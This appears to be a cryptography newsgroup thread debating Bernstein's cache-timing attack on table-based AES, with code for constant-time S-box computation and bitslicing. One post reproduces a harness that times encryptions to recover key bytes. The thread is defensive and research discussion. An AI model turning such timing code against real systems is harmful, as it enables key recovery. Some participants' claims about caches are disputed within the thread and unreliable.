compromised in this way by a remote attacker on the other side of a
wide-area network link?
Does anyone know whether one can implement AES efficiently using a
bitslice (or similar) strategy?
By the way, one way to compute the AES S-box in constant time is by
raising the input to the 254th power in GF(2^8), using constant-time
subroutines for squaring and multiplication. I think I first saw this
idea in a paper by Bloemer et al in SAC 2004.
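A minimal sketch of that idea (my own code, not from the cited paper): a
branch-free GF(2^8) multiply and a fixed square-and-multiply chain for x^254,
so the work done is the same for every input. The S-box proper is this
inverse followed by AES's fixed affine map, which is also constant-time.

#include <stdint.h>

/* Branch-free multiplication in GF(2^8) modulo the AES polynomial 0x11B. */
static uint8_t gf_mul(uint8_t a, uint8_t b)
{
  uint8_t r = 0, hi;
  int i;
  for (i = 0; i < 8; i++) {
    r ^= (uint8_t)(-(b & 1) & a);          /* add a when the low bit of b is set */
    hi = (uint8_t)(-(a >> 7));             /* 0xFF when a's top bit is set */
    a = (uint8_t)((a << 1) ^ (hi & 0x1B)); /* xtime: multiply by x and reduce */
    b >>= 1;
  }
  return r;
}

/* Inversion as x^254 with a data-independent multiplication schedule. */
static uint8_t gf_inv(uint8_t x)
{
  uint8_t x2   = gf_mul(x, x);
  uint8_t x3   = gf_mul(x2, x);
  uint8_t x6   = gf_mul(x3, x3);
  uint8_t x12  = gf_mul(x6, x6);
  uint8_t x15  = gf_mul(x12, x3);
  uint8_t x30  = gf_mul(x15, x15);
  uint8_t x60  = gf_mul(x30, x30);
  uint8_t x120 = gf_mul(x60, x60);
  uint8_t x126 = gf_mul(x120, x6);
  uint8_t x252 = gf_mul(x126, x126);
  return gf_mul(x252, x2);                 /* x^254 */
}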
AES can be implemented without tables but it is very slow compared to
the normal methods. But it can also be implemented with quite small
tables at about half normal speed, and I have not seen any timing
anomalies in this implementation.
Brian Gladman
By "quite small", do you mean an 8-bit to 8-bit table
(e.g., for inversion in GF(2^8))? Or do you perhaps mean
the trick by which inversion in GF(2^8) can be expressed as
a few operations in GF(2^4), which I presume could be expressed
with 4-bit tables?
>It seems that the design of constant-time algorithms depends on
>the implementation platform. On some 8-bit embedded processors,
>data-dependent shifts and rotates are not constant-time, while AES
>S-box computations may well be constant-time (whether due to the lack
>of cache, or to other strategies for evaluating the AES S-box without
>table lookups).
This is very true.
John Savard
http://home.ecn.ab.ca/~jsavard/index.html
Good question. Someone should set up a challenge server that acts as a
random oracle to test this problem.
Tom
I did think about these options but the one I was specifically thinking
of is different as all of these options are very slow in software.
The normal AES implementations use large tables of 4096 bytes each and
can have up to 4 such tables with a total table byte count of up to
16384 bytes (half this for encryption only). This puts a lot of
pressure on the cache in some machines and it is this that the timing
attack is able to exploit.
But AES can be implemented at about half maximum speed with two tables
each of 1024 bytes (or only 1024 bytes for encryption alone). While
this won't completely eliminate timing issues, it is not pressing the
cache anywhere near as hard and will therefore be far less likely to be
easily exploitable.
It was this option that I had in mind. I have run DJB's timing attack on
this code on a P3 - where the attack works for large tables - and was
unable to see any timing effects with his code.
Brian Gladman
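For reference, a sketch of the general trick that makes the small-table
version work (my own illustration, not Brian's code): the four "virtual"
round tables are byte rotations of a single 1KB table, so three of them can
be replaced by rotations at a modest speed cost. The rotation direction
depends on the table's byte ordering.

#include <stdint.h>

#define ROTR32(v, n) (((v) >> (n)) | ((v) << (32 - (n))))

extern const uint32_t T0[256];  /* the single 1KB round table (assumed name) */

/* one output column of an AES round, computed from T0 alone; s0..s3 are the
   state bytes selected for this column and rk is the round-key word */
static uint32_t round_column(uint8_t s0, uint8_t s1, uint8_t s2, uint8_t s3,
                             uint32_t rk)
{
  return T0[s0]
       ^ ROTR32(T0[s1], 8)
       ^ ROTR32(T0[s2], 16)
       ^ ROTR32(T0[s3], 24)
       ^ rk;
}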
Thanks for the report.
> The "worst" case was the "devine" implementation on a Pentium III. 50%
> of the key bytes showed a repetitive pattern.
You shouldn't compare implementations based on how badly they flunk this
very simple test. Even if you don't take the serious cryptographer's
attitude that leaking a single key byte is a disaster, you should assume
that slightly more sophisticated attacks will obtain all the key bits.
This is certainly an issue for RC6, although it doesn't bother me as
much as the lack of key agility in RC6.
> By the way, one way to compute the AES S-box in constant time is by
> raising the input to the 254th power in GF(2^8), using constant-time
> subroutines for squaring and multiplication. I think I first saw this
> idea in a paper by Bloemer et al in SAC 2004.
http://cr.yp.to/talks.html#2001.10.29, page 20, specifically identifies
input-independent timings as an advantage of this reciprocal strategy.
(I'm citing the Bloemer paper for other reasons.)
Thanks for pointing that out. I hadn't seen that before. I appreciate
the reference. I'll update my notes.
Sure, AES as well as most other block ciphers can be
implemented in various ways "in silicon", and most
of the obvious ones won't have caches. That's not
to say that key- or data-dependent timing variations
aren't still possible, but at least it's not as hard
for the implementor to take steps to avoid them.
> Could be random. I didn't look for (and am not planning to look for)
> further patterns; 24 leaked key bits is already unacceptable.
>
> If you want to try extracting the entire key, you could look for more
> patterns in the timings, or you could arrange for different sets of
> variables to be touched before the AES call.
this being so,
it is curious why rijndael is still the 'aes',
and that the government hasn't advised a move to another symmetric algorithm,
pending further investigation.
can the cache timing attack be exploited to attack an already encrypted file,
or extract the key,
if one does not have access to the machine while it is encrypting?
vedaal
Pick your favorite among the following possible reasons:
1) because this wasn't part of the threat model / evaluation criteria
for the AES.
2) because in many environments, this attack will either not pose a threat
or can be defended against adequately.
3) because most block ciphers out there suffer from the same issue.
Sorry; I think I asked the wrong question. I meant, can one implement
AES efficiently in software using bitslice (or similar) strategies?
I guess what you are suggesting is a special-purpose
peripheral "crypto machine" that has a simple architecture.
In fact these exist; Motorola's AIM was the first I know
of offered to the general public. It could be programmed
to support several independent channels, each with its own
algorithm.
Nope. I'm referring to a particular implementation strategy,
in software only (using only whatever standard CPU you already have
access to), for implementing block ciphers. This implementation strategy
is distinguished by its use of logical bitwise operations (OR, AND, XOR,
NOT, etc.) on the microprocessor to perform 32 logical operations in
parallel (on a 32-bit microprocessor). Serpent is a famous example
of a cipher amenable to this implementation strategy. I was curious
whether there are any efficient ways to implement AES using this
kind of approach.
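A tiny illustration of the layout (mine, not from Biham's DES paper): word j
holds bit j of each of 32 independent bytes, and one bitwise expression over
those words then evaluates the same boolean function for all 32 bytes at once.

#include <stdint.h>

/* pack 32 bytes into bitsliced form: bit i of w[j] is bit j of in[i] */
static void to_bitslice(const uint8_t in[32], uint32_t w[8])
{
  int i, j;
  for (j = 0; j < 8; j++) {
    uint32_t v = 0;
    for (i = 0; i < 32; i++)
      v |= (uint32_t)((in[i] >> j) & 1) << i;
    w[j] = v;
  }
}

/* toy function (bit0 AND bit1) XOR bit7, evaluated for all 32 bytes with
   two instructions instead of 32 separate evaluations */
static uint32_t toy_bitsliced_fn(const uint32_t w[8])
{
  return (w[0] & w[1]) ^ w[7];
}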
Back before Rijndael became AES, I looked at doing this using the MMX
operations on the Pentium II (or was it the Pentium MMX? I'm not sure,
but it was something from that era) -- the idea being that you could
perform several modular inversions in parallel.
In terms of the simple operation count, it worked out to being about 1/3
of the speed of the lookup table approach, so I didn't pursue it any
further. If this is still a concern, I'll see if I can find my notes...
after I submit my thesis, get my viva scheduled, graduate, and escape
from Oxford. All my notes are in Vancouver.
Colin Percival
I think Dr. Wagner is referring to Biham's "bitslice" method of doing
32 or 64 DES encryptions in parallel using scalar registers, and asking
if it can be applied to AES. The bitslice technique can be implemented
in hardware or software. See "A Fast New DES Implementation in Software"
at http://www.cs.technion.ac.il/~biham/publications.html.
I'm sure AES can be implemented using the bitslice technique. The
question is whether that would be faster than a traditional
implementation, at least in those cases that can benefit from doing
several blocks in parallel.
--Mike Amling
Right. Thanks for digging up the pointer.
> I'm sure AES can be implemented using the bitslice technique. The
>question is whether that would be faster than a traditional
>implementation, at least in those cases that can benefit from doing
>several blocks in parallel.
I'd settle if bitslice implementations just were "not too much slower"
than ordinary implementations of AES. The motivation was whether they
could serve as a defense against cache timing attacks without incurring
too much overhead.
> > I'm sure AES can be implemented using the bitslice technique. The
> >question is whether that would be faster than a traditional
> >implementation, at least in those cases that can benefit from doing
> >several blocks in parallel.
>
> I'd settle if bitslice implementations just were "not too much slower"
> than ordinary implementations of AES. The motivation was whether they
> could serve as a defense against cache timing attacks without incurring
> too much overhead.
I've posted on my web site a variant of my AES implementation that
stores the S-box tables in banks of bits -- bit number zero of all 256
entries is stored in the first 32 bytes, then bit number one of all 256
entries, and so on. With the Intel cache line length of 32 bytes I
believe this version should resist the S-box timing attack.
karl m
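A sketch of that layout as I read the description (the array name and exact
arrangement are my assumptions; karl m's actual code is on his site): each
bank is 32 bytes, i.e. one cache line, so a lookup touches the same eight
lines no matter what the index is.

#include <stdint.h>

extern const uint8_t sbox_banks[8][32];  /* bank j holds bit j of S[x] for all x */

/* assemble S[x] one bit per bank; the byte read from each bank varies with x,
   but every lookup stays inside the same eight 32-byte lines */
static uint8_t banked_sbox(uint8_t x)
{
  uint8_t result = 0;
  int j;
  for (j = 0; j < 8; j++) {
    uint8_t bit = (uint8_t)((sbox_banks[j][x >> 3] >> (x & 7)) & 1);
    result |= (uint8_t)(bit << j);
  }
  return result;
}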
D. J. Bernstein wrote:
> http://cr.yp.to/papers.html#cachetiming
>
> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
> Statistics, and Computer Science, University of Illinois at Chicago
How exactly would an attacker exploit the timing information to
determine some key bytes in an actual attack?
You can determine the slowest index into the lookup (which is what you
do with the program in your paper), but for that you need knowledge of
the key.
You can also determine a plaintext byte which results in slowest lookup
(provided that you can choose the plaintext for the attacked device),
but that won't help you if you don't know the actual lookup index.
Any ideas?
Best regards
Stefan
The attack actually does work. Why it works I'm not 100% sure. The
function he designed does emit a value which when xor'ed with the key
byte produces the same value over multiple runs. For instance you saw
us saying something like
byte 1, loops 256: 245 245 245 245 ...
That means for the 1st key byte the function returned "key ^ 245".
Since it's reliable you can then infer that key is actually the return
value xor'ed with 245.
The attack is highly sensitive to how the function was implemented
*and* compiled. That, and it's effectively impossible to exploit in
virtually any system cuz well it's a chosen plaintext attack and has to
be run as close to the system as possible.
So for example, you'd have to be logged into Amazon, somehow getting an
SSL session to encrypt thousands of texts for you while not violating
the session [on either end] to get 24 out of 128 bits. Totally likely
scenario.
In cases where a local login and chosen plaintext venue is possible the
solution would be as simple as using the 1 table method [because the
other tables are just rotated versions]. 1KB of ram would easily fit in
practically any modern L1 cache and it would get many hits that would
significantly reduce the attack. Further than that you can compute the
sbox on the fly.
DJ should get credit for developing the attack cuz it's cool. Aside
from that though I wouldn't worry about it in the field. Well... be
"aware" of the attack and use it during your design but I don't think we
have to stop the world from spinning to replace AES just yet.
Tom
I've posted on my site a version that shouldn't have input-dependent
timings and is only 10-20% slower than the naive table-driven
implementation.
www.geocities.com/malbrain/newaes3_c
karl m
This will be very slow when compared with normal table-driven
implementations of AES on modern Intel x86 family processors.
For large messages used with pre-computed key schedules, pretty well all
decent table driven versions of AES can achieve less than 30 cycles per
byte on modern x86 processors - what will your version achieve in such
situations?
In what circumstances do you think it will be only 10-20% slower?
Brian Gladman
Tom St Denis wrote:
> Stefan Tillich wrote:
>
>> Hi,
>>
>> D. J. Bernstein wrote:
>>
>>> http://cr.yp.to/papers.html#cachetiming
>>>
>>> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
>>> Statistics, and Computer Science, University of Illinois at Chicago
>>
>>
>>
>> How exactly would an attacker exploit the timing information to
>> determine some key bytes in an actual attack?
>>
>> You can determine the slowest index into the lookup (which is what you
>> do with the program in your paper), but for that you need knowledge of
>> the key.
>>
>> You can also determine a plaintext byte which results in slowest
>> lookup (provided that you can choose the plaintext for the attacked
>> device), but that won't help you if you don't know the actual lookup
>> index.
>>
>> Any ideas?
>
>
> The attack actually does work. Why it works I'm not 100% sure. The
> function he designed does emit a value which when xor'ed with the key
> byte produces the same value over multiple runs. For instance you saw
> us saying something like
>
> byte 1, loops 256: 245 245 245 245 ...
>
> That means for the 1st key byte the function returned "key ^ 245". Since
> it's reliable you can then infer that key is actually the return value
> xor'ed with 245.
As far as I can see, the output is (plaintext_byte ^ key_byte), which
would be the index into one of the T tables (in a 4 T-table
implementation). So IMHO you need to determine which such indexes result
in slower AES operation. Doing this seems very unlikely in a real-world
setting.
The code in the paper demonstrates that there can be a dependency of AES
execution time on some index into T. What the paper is lacking (or what
should be done in a follow-up paper) is a demonstration that key
bytes can be recovered, at least in a controlled laboratory setting. If
this cannot even be done in an environment where almost all parameters
are under the attacker's control, then a real-world attack is infeasible.
>
> The attack is highly sensitive to how the function was implemented
> *and* compiled. That, and it's effectively impossible to exploit in
> virtually any system cuz well it's a chosen plaintext attack and has to
> be run as close to the system as possible.
I agree. In my opinion, an attack can be mounted only if at least
the following information is known:
- Complete sourcecode of program which computes AES, compiler, compiler
version OR the object code
- Processor, cache organization, cache size, cache replacement strategy
- Operating system, version
>
> So for example, you'd have to be logged into Amazon, somehow getting an
> SSL session to encrypt thousands of texts for you while not violating
> the session [on either end] to get 24 out of 128 bits. Totally likely
> scenario.
As DJ said himself: To get 1 clock cycle out of timing noise due to
network latency is infeasible.
>
> In cases where a local login and chosen plaintext venue is possible the
> solution would be as simple as using the 1 table method [because the
> other tables are just rotated versions]. 1KB of ram would easily fit in
> practically any modern L1 cache and it would get many hits that would
> significantly reduce the attack. Further than that you can compute the
> sbox on the fly.
>
> DJ should get credit for developing the attack cuz it's cool. Aside
> from that though I wouldn't worry about it in the field. Well... be
> "aware" of the attack and use it during your design but I don't think we
> have to stop the world from spinning to replace AES just yet.
The least I expect from a paper on an attack is to demonstrate how it
can be done at least in the laboratory.
Best regards
Stefan Tillich
Only the S-Box and InvMixColumn functions are slower -- about 8 times
and 4 times respectively over their naive table lookup counterparts.
> For large messages used with pre-computed key schedules, pretty well all
> decent table driven versions of AES can achieve less than 30 cycles per
> byte on modern x86 processors - what will your version achieve in such
> situations?
The issue is an implementation of AES that withstands
timing attacks. I don't claim that my posted version is optimized,
only that it runs in constant time when compiled with a compiler that
emits jump-free instructions for ?: expressions. Microsoft VC
version 12.00.8804 is one such compiler. I've examined the assembly
code and there are no data-dependent jumps.
> In what circumstances do you think it will be only 10-20% slower?
I compared to my previous naive table-lookup program, also posted on
my site at www.geocities.com/malbrain/aes_c.html, to get the 10-20%
figure. It's just a rough number derived from 74 MB in 1 minute vs.
1.20 minutes. Perhaps you'd be willing to insert the necessary CPU
instructions to obtain the cycles per byte figure you desire.
karl m
I've tried unsuccessfully to reproduce your results. I entered the
following functions from your paper. Perhaps you could point out my
error.
#include <stdio.h>
#include <string.h>

#define Nb 4               /* AES block size in 32-bit words */
#define Nr 10              /* number of rounds for a 128-bit key */

/* prototypes inferred from the calls below; Encrypt/ExpandKey come from my
   AES implementation, mrandom/xrandom from the Berkeley random library */
void Encrypt (unsigned char *in, unsigned *expkey, unsigned char *out);
void ExpandKey (unsigned char *key, unsigned *expkey);
void mrandom (int len, char *seed);
long xrandom (void);

unsigned char in[4 * Nb], out[4 * Nb], key[4 * Nb];
unsigned expkey[Nb * (Nr + 1)];

/* read the Pentium time stamp counter */
__int64 rd_clock (void)
{
    unsigned dwLow, dwHigh;

    __asm {
        rdtsc
        mov dwLow, eax
        mov dwHigh, edx
    }
    return ((__int64)dwHigh)<<32 | dwLow;
}

/* time one encryption, discarding obviously interrupted measurements */
int aescycles ()
{
    __int64 start, end;
    int t;

    do {
        start = rd_clock();
        Encrypt (in, expkey, out);
        end = rd_clock ();
        t = end - start;
    } while( t <= 0 || t >= 1000);
    return t;
}

/* return the value of input byte b that maximizes the total encryption time */
int bestx (int b, int loops)
{
    int bestx = 0, bestxt = 0;
    int x, xt, i, j;

    for( x = 0; x < 256; x++ ) {
        xt = 0;
        for( i = 0; i < loops; i++ ) {
            for( j = 0; j < 16; j++ )
                in[j] = xrandom() >> 16;
            in[b] = x;
            xt += aescycles(); xt += aescycles(); xt += aescycles();
            xt += aescycles(); xt += aescycles();
        }
        if( xt > bestxt )
            bestx = x, bestxt = xt;
    }
    return bestx;
}

void bernstein (char *seed)
{
    int loops, b, j, k;

    mrandom (strlen(seed), seed);
    for( loops = 4; loops <= 65536; loops *= 2) {
        for( b = 0; b < 16; b++ ) {
            printf ("%.2d, %.5d loops:", b, loops);
            for( k = 0; k < 10; k++ ) {
                for( j = 0; j < 16; j++ )
                    key[j] = xrandom() >> 16;
                ExpandKey (key, expkey);
                printf (" %.2x", bestx (b, loops) ^ key[b]);
                fflush (stdout);
            }
            printf ("\n");
        }
    }
}
The mrandom and xrandom functions are from the standard berkeley
library.
Thanks, karl m
That's trivial to achieve. The real issue is whether it is possible
to implement AES in a way that withstands timing attacks *and* is relatively
efficient, where "relatively efficient" means "not too much slower than the
best existing (non-constant-time) AES implementations".
Comparing to a very slow existing non-constant-time implementation is
not interesting. You have to compare to the best existing implementations
to get a meaningful comparison -- or, you have to report absolute performance
numbers in some accepted metric (e.g., cycles/byte).
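As a sketch of measuring that metric (the block-encryption function name here
is hypothetical, standing in for whatever implementation is being tested):

#include <stdint.h>
#include <stdio.h>

extern void aes_encrypt_block(unsigned char out[16], const unsigned char in[16]);

/* read the time stamp counter as a 64-bit value */
static uint64_t rdtsc64(void)
{
  uint32_t lo, hi;
  asm volatile("rdtsc" : "=a"(lo), "=d"(hi));
  return ((uint64_t)hi << 32) | lo;
}

int main(void)
{
  unsigned char in[16] = {0}, out[16];
  const int blocks = 65536;
  uint64_t start, elapsed;
  int i;

  start = rdtsc64();
  for (i = 0; i < blocks; i++)
    aes_encrypt_block(out, in);
  elapsed = rdtsc64() - start;
  printf("%.2f cycles/byte\n", (double)elapsed / (16.0 * blocks));
  return 0;
}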
The specific cycles-per-byte values for the encryption function with
a pre-expanded key increased from 375 to 750 cycles per byte on my
reference implementations. While I believe from inspecting the assembly
code that the code path has a constant length, with only loop-control
jumps, and runs through the entire S-box table 8 times per byte
transform, the resulting cycles-per-byte timings are not constant for
some unknown reason.
Meanwhile, I'm having a major problem.
I'm unable to duplicate the published attack, and frankly don't understand
how the "simple cache-timing attack on AES" keeps the S-BOX values out of
the cache for reload-timings during its run-after-run collections of
cycle counts. Perhaps Professor Bernstein has not implemented
something correctly, or has a hardware misconfiguration where the Level
1 or Level 2 cache is turned off. Has anyone been able to duplicate
his result? I'll post sample code on my web site shortly.
Thanks, Karl m
That counts as extremely slow -- so slow as to render this
implementation strategy pretty useless, most likely.
>I'm unable to duplicate the published attack, and frankly don't understand
>how the "simple cache-timing attack on AES" keeps the S-BOX values out of
>the cache for reload-timings during its run-after-run collections of
>cycle counts. Perhaps Professor Bernstein has not implemented
>something correctly, or has a hardware misconfiguration where the Level
>1 or Level 2 cache is turned-off. Has anyone been able to duplicate
>his result? I'll post sample code on my web site shortly.
Are you running on the same architecture as him? The attack might be
architecture-dependent. His paper includes some comments about the fact
that Athlon caches are 2-way associative. Caches on a Pentium might well
be organized differently, leading to different timing effects (I don't know).
They're slightly smaller if you time the function after it is loaded
into the processor's cpu-cache: 226 and 628 cycles per byte.
> >I'm unable to duplicate the published attack, and frankly don't understand
> >how the "simple cache-timing attack on AES" keeps the S-BOX values out of
> >the cache for reload-timings during its run-after-run collections of
> >cycle counts. Perhaps Professor Bernstein has not implemented
> >something correctly, or has a hardware misconfiguration where the Level
> >1 or Level 2 cache is turned off. Has anyone been able to duplicate
> >his result? I'll post sample code on my web site shortly.
>
> Are you running on the same architecture as him? The attack might be
> architecture-dependent. His paper includes some comments about the fact
> that Athlon caches are 2-way associative. Caches on a Pentium might well
> be organized differently, leading to different timing effects (I don't know).
I've tried four different Athlon platforms and two Pentium:
AMD Athlon 800MHz, AMD Athlon ? MHz, AMD Athlon XP 2000, AMD Athlon
1GHz, Pentium-S 100MHz, Pentium-M. I get nothing but random numbers
for the S-Box table lookup version, with or without table lookups for
the Xtime function calls.
There seems to be some difference of opinion as to the difficulty of
obtaining a constant time AES implementation. You say it's trivial,
while Professor Bernstein says it's nearly impossible. I would say
that expecting a single implementation strategy to be sufficient for
all platforms is idealism. The only real platform where timing attacks
should be a problem is the stand-alone device, like the DES PC cards
used for electronic banking, that have 8-bit processors without caches.
Of course today, one would expect engineers to design using embedded
processors with cache. On this platform, absolute constant time would
be necessary, or randomized timing.
From the experience of adding timing attack resistance to my reference
implementation, constant time on a Pentium/Athlon platform is going to
be impossible. My guess is that the market for 8-bit processors isn't
going away any time soon.
karl m
Slightly slower than 'extremely slow' is still 'very slow', alas.
>I've tried four different Athlon platforms and two Pentium:
>AMD Athlon 800MHz, AMD Athlon ? MHz, AMD Athlon XP 2000, AMD Athlon
>1GHz, Pentium-S 100MHz, Pentium-M. I get nothing but random numbers
>for the S-Box table lookup version, with or without table lookups for
>the Xtime function calls.
Huh. Well, that renders my hypothesis pretty implausible.
I have no clue, then; sorry.
>There seems to be some difference of opinion as to the difficulty of
>obtaining a constant time AES implementation. You say it's trivial,
>while Professor Bernstein says it's nearly impossible.
It's trivial. See my earlier post; you turn it into a circuit, and
then you use XOR, AND, OR, and NOT instructions.
What seems to be very difficult (perhaps nearly impossible?) is to
achieve a portable constant-time AES implementation that is almost as
fast as the best non-constant-time AES implementation. At least, I don't
know how to do it.
>I would say
>that expecting a single implementation strategy to be sufficient for
>all platforms is idealism. The only real platform where timing attacks
>should be a problem is the stand-alone device, like the DES PC cards
>used for electronic banking, that have 8-bit processors without caches.
>Of course today, one would expect engineers to design using embedded
>processors with cache. On this platform, absolute constant time would
>be necessary, or randomized timing.
That makes sense to me.
> >I've tried four different Athlon platforms and two Pentium:
> >AMD Athlon 800MHz, AMD Athlon ? MHz, AMD Athlon XP 2000, AMD Athlon
> >1GHz, Pentium-S 100MHz, Pentium-M. I get nothing but random numbers
> >for the S-Box table lookup version, with or without table lookups for
> >the Xtime function calls.
>
> Huh. Well, that renders my hypothesis pretty implausible.
> I have no clue, then; sorry.
That brings me back to my original concern, how the timing attack works
since the complete S-Box lookup table should be loaded into the cache
after the first few timing calls. Professor Bernstein's attack runs by
timing thousands of encryptions, five for each probing random
plain-text value in each of 16 positions for a thousand loops. After
the first probe there should be no cache-load timing difference to
measure on the subsequent four calls, and in any event, the complete
S-Box table should be in cache after a very few encryption trials.
Something just doesn't add up to me.
Has anyone else checked his work? Does it work only on platforms
without level 2 cache, or without both level 1 and level 2 caches?
Does it work with or without tables for the xtime function?
Thanks, karl m
Well, I guess it would be worthwhile to study more. When I first saw
Professor Bernstein's "Summary of AES" I skipped over it. Now that
I've read it, I see that it's a highly optimized implementation that
expands the S-boxes from 256 bytes into thousands of bytes. No wonder
there's a cache-timing attack.
So my proposed re-layout of the 256-byte S-Box is totally unnecessary,
and in fact my original implementation is immune to simple timing
attacks. That's why I get random numbers from the timing attack on it.
I'll look at optimizing the 227 (relatively constant) cycles per byte
using the simple 256 byte S-Box table.
Thanks, karl m
I don't believe your attack says anything beyond the unfortunate
circumstance of the SBOX TABLES not fitting into the LEVEL-ONE CACHE.
Your described AES implementation uses 4096 bytes for S-BOX tables,
and some CPUs cannot support the overall working set size of your
attack system, leading to what we can call thrashing between memory
and the CPU LEVEL-ONE CACHE.
It's easy to overcome your attack when you guarantee that the
LEVEL-ONE CACHE is of sufficient size to avoid thrashing. I don't
think that pre-loading the S-BOX into LEVEL-ONE CACHE will help in the
attacks you demonstrate BECAUSE THEY DON'T FIT IN THE FIRST PLACE.
Furthermore, since a timing attack is only of concern to an embedded
system, I fail to understand the point of the title of this thread.
The "typical software implementation" on the typical desktop platform
has many means of exposing a complete key already. Why does it matter
that there is a "simple timing attack" on these platforms? Why would
we avoid large or small S-Boxes on them, thrashing or not?
You also mention elsewhere the possibility of a remote timing attack.
AS LONG AS THE SERVER CONTAINS AN ADEQUATE LEVEL-ONE CACHE FOR THE AES
IMPLEMENTATION RUNNING ON THEM, I PREDICT YOUR ATTACK WILL FAIL TO
DEMONSTRATE ANYTHING HERE.
The only lesson I can see, which was already well known previously, is
to certify that an embedded system avoids cache thrashing and/or
offers constant time hardware access to data storage independent of
the process working set LEVEL-ONE CACHE.
karl m
Every serious AES software implementation (for the Pentium, the Athlon,
the PowerPC, etc.) works this way.
If your painfully slow software had been the fastest implementation
of Rijndael then Rijndael wouldn't have made it past the first round of
the AES competition.
No, I never said that. In fact, my paper says exactly the opposite:
``One can implement AES using these [constant-time] operations.''
Actually, what my paper says is ``One can implement AES using these
operations, of course.'' The knowledgeable reader is already aware that
every circuit can be implemented with those constant-time operations.
The problem is performance. Here's the complete sentence: ``One can
implement AES using these operations, of course, but the result is
painfully slow.'' Every fast AES implementation uses array lookups---and
making _those_ take constant time is difficult.
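To illustrate why the all-constant-time route is slow: a table lookup
built only from those operations has to touch every entry and select the
wanted one with masks, roughly as in the sketch below (illustrative only,
not taken from any particular AES library):

#include <stdint.h>

/* Constant-time S-box lookup: read all 256 entries and keep the one whose
   index matches, using masking instead of a data-dependent address.
   Roughly 256 times the memory traffic of a single array access. */
static uint8_t sbox_lookup_ct(const uint8_t sbox[256], uint8_t x)
{
    uint8_t result = 0;
    for (unsigned i = 0; i < 256; i++) {
        /* mask is 0xFF when i == x and 0x00 otherwise, without branching */
        uint8_t mask = (uint8_t)(((i ^ x) - 1u) >> 8);
        result |= (uint8_t)(mask & sbox[i]);
    }
    return result;
}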
False. For example, the Athlon's level-1 data cache has 65536 bytes, as
stated in the sixth paragraph of the ``Load-timing variability'' section
of my paper. The most extreme AES encryption tables I've seen are 8192
bytes.
There are several reasons that preloading the tables doesn't stop timing
attacks---as the same section points out in considerable detail---but
the size of the L1 cache is not one of those reasons.
You have an inaccurate mental model of the computer's cache. If it's any
consolation, the same inaccurate model appears in previous papers on
this topic. My paper goes to considerable effort to point out the most
important errors in the model.
1. Engineers rely on rules of thumb, design guidelines, and
experience.
2. 4096 bytes out of 65536 is a significant FRACTION given the
variety of LEVEL-ONE CACHE organizations.
3. No design should overflow the LEVEL-ONE CACHE of its target platform
to the point that MEMORY THRASHING occurs.
I just don't see where your work fits in.
karl m
I dunno where this thread is going but rest assured his attack does in
fact work. It's highly sensitive to the machine, build options and
runtime environment but it does work.
At first I said the same thing since his attack doesn't work [as
specified] on AES as built in LTC. However, the same attack against SSL
worked fine on my AMD64.
No sense getting all upset and rude at him as the attack does in fact work.
Tom
By the same token, your problem is misapplication. The system you
designed for your simple timing attack would never be designed for the
platform you ran it on. There are cpu chips with adequate LEVEL-ONE
CACHE designed for the 4096 byte S-Boxes. What is your relevance?
karl m
You are confusing SYSTEMS with SOFTWARE. Every serious AES SYSTEM is
designed for a particular threat model. For the platforms you
published results for, there is no PHYSICAL ACCESS scenario where your
simple timing attack is VIABLE. Sorry.
karl m
My painfully slow software is only a REFERENCE IMPLEMENTATION. It's
part of a much larger SYSTEM. karl m
Why do you think your implementation is immune to Professor Bernstein's
simple cache attack? Does it use fewer table bytes, do you run it on
platforms with adequate cache, or some other reason?
> No sense getting all upset and rude at him as the attack does in fact
> work.
Well, I've been called rude on this forum before. Do you have a copy
of Bruce S book from Spring 1999? Look at the back jacket cover for an
indication of where EMOTION COMES INTO PLAY IN CRYPTOGRAPHY.
Thanks, karl m
Different build options, likely. Both of ours are based on the Rijndael
team's "fast-alg" code.
>> No sense getting all upset and rude at him as the attack does in fact
>> work.
>
> Well, I've been called rude on this forum before. Do you have a copy
> of Bruce S book from Spring 1999? Look at the back jacket cover for an
> indication of where EMOTION COMES INTO PLAY IN CRYPTOGRAPHY.
You're the one getting all upset with DJ, not me. At first I called him
on the attack, verified it, and now it's all cool. You seem to be angry
at him for some reason.
Sure his attack is largely impractical but it's good to learn these
things in the long run.
Tom
But you say its ORGANIZATION is? Let's see, a few rough figures: 64K
of cache is a 16-bit address space, and a 4096-byte table (2 ** 12)
accounts for 12 of those bits. That leaves only 4 bits' worth of slack
for the line length, the associativity logic, and whatever other
unknown design criteria get thrown in. Sounds like thin ice to me, with
plenty of
room for your naive-simple-cache attack to fall in.
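For what it's worth, filling in concrete numbers for one plausible
organization (my own assumption of 2-way associativity and 64-byte lines
for an Athlon-class part, not figures from the paper) gives the following
picture of how the table maps into the cache:

#include <stdio.h>

int main(void)
{
    /* Assumed cache geometry -- adjust for the actual part. */
    unsigned cache_bytes = 64 * 1024;   /* total L1 data cache   */
    unsigned line_bytes  = 64;          /* bytes per cache line  */
    unsigned ways        = 2;           /* associativity         */
    unsigned table_bytes = 4096;        /* AES encryption tables */

    unsigned lines       = cache_bytes / line_bytes;   /* 1024 lines */
    unsigned sets        = lines / ways;               /* 512 sets   */
    unsigned table_lines = table_bytes / line_bytes;   /* 64 lines   */

    printf("cache: %u lines in %u sets of %u ways\n", lines, sets, ways);
    /* a contiguous table touches min(table_lines, sets) distinct sets */
    printf("table: %u lines (%u%% of the cache), touching %u of %u sets\n",
           table_lines, 100 * table_bytes / cache_bytes,
           table_lines < sets ? table_lines : sets, sets);
    return 0;
}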
karl m
Do you mean optimization options or platform options? How many bytes
do your S-Box tables occupy? Which processor/platform did you test on?
> >>No sense getting all upset and rude at him as the attack does in
fact
> >
> > work.
> >
> > Well, I've been called rude on this forum before. Do you have a
copy
> > of Bruce S book from Spring 1999? Look at the back jacket cover
for an
> > indication where EMOTION HAS PLAY IN CRYPTOGRAPHY.
>
> You're the one getting all upset with DJ not me. At first I called
him
> on the attack, verified it and now it's all coo. You seem to be
angry
> at him for some reason.
>
> Sure his attack is largely impractical but it's good to learn these
> things in the long run.
I think these things were already widely known before his paper. The
question then becomes, why are our tax-dollars supporting it? Which
graduate students is he working with? What are they learning from
this?
karl m
I'd assume SSL used -O2. I used -O3 [with some others]. We both use the
4KB tables with gcc 3.4.2 on an AMD64.
With SSL the attack works. With LTC it doesn't [well, it might, but it
doesn't work as DJ described].
> I think these things were already widely known before his paper. The
> question then becomes, why are our tax-dollars supporting it? Which
> graduate students is he working with? What are they learning from
> this?
I'd venture a guess that nobody thought that such an attack would be so
simple or effective. I can speak for myself in saying I was highly
skeptical at first.
